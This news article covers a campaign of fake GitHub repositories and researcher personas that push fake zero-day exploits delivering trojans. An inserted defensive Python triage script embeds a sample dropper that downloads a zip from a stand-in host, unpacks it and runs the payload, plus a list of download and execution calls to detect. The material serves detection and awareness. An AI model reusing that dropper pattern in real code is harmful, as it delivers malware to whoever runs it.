In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but which instead deliver malware.
The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity firms.
"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware," researchers from security firm VulnCheck, who found the rogue repositories, said in a report.
"It’s unclear if they have been successful but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful."
While attacks that target security researchers are not new, they are relatively rare and more likely to be the work of advanced persistent threat (APT) groups seeking the sensitive information that researchers can access.
This was the case with a campaign reported by Google's Threat Analysis Group in 2021, in which a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms. The accounts were used to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos.
How the GitHub fake account campaign works
In that 2021 campaign, the fake accounts were used to contact real researchers and invite them to collaborate. As part of the communication, the attackers shared a Visual Studio project with proof-of-concept exploit code, but the project also included a malicious DLL that deployed malware on the victim's computer.
Separately, some researchers who visited the blog had their up-to-date systems exploited, suggesting the attackers had access to some zero-day exploits.
VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure communications app that's well regarded in the security community.
The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.
All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security that doesn't seem to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google.
However, the 2021 attack seems to have involved significantly more sophistication than this latest campaign and there's no evidence it's the work of the same attackers.
The malicious code is distributed from the rogue GitHub repositories as a file called poc.py. It downloads one of two additional files depending on the operating system, cveslinux.zip or cveswindows.zip. The archive is then unpacked and the file inside is executed.
The Windows payload is detected by 36 antivirus programs on VirusTotal as a trojan program, while the Linux binary is flagged by 25.
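The download, unpack and execute shape described for poc.py can be looked for before a proof-of-concept is ever run. The following is an added example, not code from VulnCheck or from the rogue repositories: a static triage that parses a Python file with ast and never executes it. The call-name list, the example.invalid URL and the payload name are assumptions made for the illustration.

```python
import ast

# Behaviours of interest and call names that indicate them (hand-picked, not exhaustive).
SIGNALS = {
    "os_check": {"platform.system", "os.name", "sys.platform"},
    "download": {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"},
    "unpack": {"zipfile.ZipFile", "shutil.unpack_archive", "tarfile.open"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call",
                "os.system", "os.popen", "os.startfile", "exec", "eval"},
}

# Constructed sample with the shape described above; it is only parsed, never run.
SAMPLE = '''\
import os, platform, subprocess, urllib.request, zipfile
name = "cveswindows.zip" if platform.system() == "Windows" else "cveslinux.zip"
urllib.request.urlretrieve("https://example.invalid/" + name, name)
zipfile.ZipFile(name).extractall("out")
subprocess.run([os.path.join("out", "payload")])
'''


def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None


def triage(source):
    """Parse the source without executing it; map each behaviour to its line numbers."""
    hits = {kind: set() for kind in SIGNALS}
    for node in ast.walk(ast.parse(source)):
        name = dotted(node)
        for kind, names in SIGNALS.items():
            if name in names:  # aliased imports (import os as o) are not resolved
                hits[kind].add(node.lineno)
    return {kind: sorted(lines) for kind, lines in hits.items()}


def is_dropper_shaped(hits):
    """True when download, unpack and execute all occur in one file."""
    return all(hits[k] for k in ("download", "unpack", "execute"))

if __name__ == "__main__":
    print(triage(SAMPLE), is_dropper_shaped(triage(SAMPLE)))
```

A match is a prompt to read the flagged lines by hand; an empty result does not clear a file, since aliased imports and encoded strings are not resolved.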
"It isn’t clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021," the VulnCheck researchers said.
"Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand."
Experienced security researchers generally take precautions when working with potentially malicious code. If they're testing a proof-of-concept exploit, this is most likely to happen on a test system inside a virtual machine that's well monitored and later wiped.
Executing such code on a work machine would most likely be a violation of standard security policies in most organisations, especially inside a cybersecurity company.